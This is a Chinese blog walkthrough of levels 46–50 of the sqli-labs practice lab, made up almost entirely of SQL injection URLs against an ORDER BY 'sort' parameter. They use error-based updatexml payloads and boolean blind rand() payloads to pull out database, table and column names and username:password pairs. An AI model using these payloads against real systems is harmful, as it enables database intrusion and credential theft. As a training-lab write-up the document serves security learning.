sql-labs46-50通关攻略

一身傲骨@2024-08-30 14:39

第46关

一.查询数据库

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+

二.查表

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+

三.查列

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+

四.查user表里数据

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20substring(group_concat(username,%27:%27,password),1,32)%20from%20users%20),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20substring(group_concat(username,%27:%27,password),1,32)%20from%20users%20),0x7e),1)--+#substring

第47关

一.查询数据库

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)--+

二.查表

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+

三.查列

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+

四.查询user表中数据

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)--+

第48关

使用布尔盲注

一.查询数据库长度

http://127.0.0.1/Less-48/?sort=rand(length(database())=8)http://127.0.0.1/Less-48/?sort=rand(length(database())=8)

数据库长度为8

二.查询数据库命第一个字符

http://127.0.0.1/Less-48/?sort=rand(ascii(mid(database(),1,1))=101)http://127.0.0.1/Less-48/?sort=rand(ascii(mid(database(),1,1))=101)

ascii码 为101第一个字符为s

........接着往后查回查出数据库为'security'

三.查表格个数

http://127.0.0.1/Less-48/?sort=rand((select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database())=4)http://127.0.0.1/Less-48/?sort=rand((select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database())=4)

说明数据库里有四个表格

四.第一个表格的名称的首字母

http://127.0.0.1/Less-48/?sort=rand(ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=101)http://127.0.0.1/Less-48/?sort=rand(ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=101)

说明第一个表的字符为e

后面数据查询,同上

第49关

同48关

区别:字符型,需要用 ' 闭合

第50关

一.查询数据库

http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,database(),0x7e),1)http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,database(),0x7e),1)

二.查表

http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)

三.查列

http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)

四.查询user表中数据

http://127.0.0.1/Less-50/?sort=updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)http://127.0.0.1/Less-50/?sort=updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)

相关推荐
NineData5 小时前
NineData 迁移评估功能正式上线
数据库·dba
NineData10 小时前
数据库迁移总踩坑?用 NineData 迁移评估,提前识别所有兼容性风险
数据库·程序员·云计算
赵渝强老师13 小时前
【赵渝强老师】PostgreSQL中表的碎片
数据库·postgresql
全栈老石17 小时前
拆解低代码引擎核心:元数据驱动的"万能表"架构
数据库·低代码
倔强的石头_1 天前
kingbase备份与恢复实战(二)—— sys_dump库级逻辑备份与恢复(Windows详细步骤)
数据库
jiayou643 天前
KingbaseES 实战:深度解析数据库对象访问权限管理
数据库
李广坤4 天前
MySQL 大表字段变更实践(改名 + 改类型 + 改长度)
数据库
爱可生开源社区5 天前
2026 年,优秀的 DBA 需要具备哪些素质?
数据库·人工智能·dba
随逸1775 天前
《从零搭建NestJS项目》
数据库·typescript
加号35 天前
windows系统下mysql多源数据库同步部署
数据库·windows·mysql
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03OpenClaw + 飞书(Feishu)环境搭建指南04Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services05小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)06Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤07OpenClaw优化飞书API 额度已耗尽问题08Window 10部署openclaw报错node.exe : npm error code 12809【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆10OpenClaw大龙虾机器人完整安装教程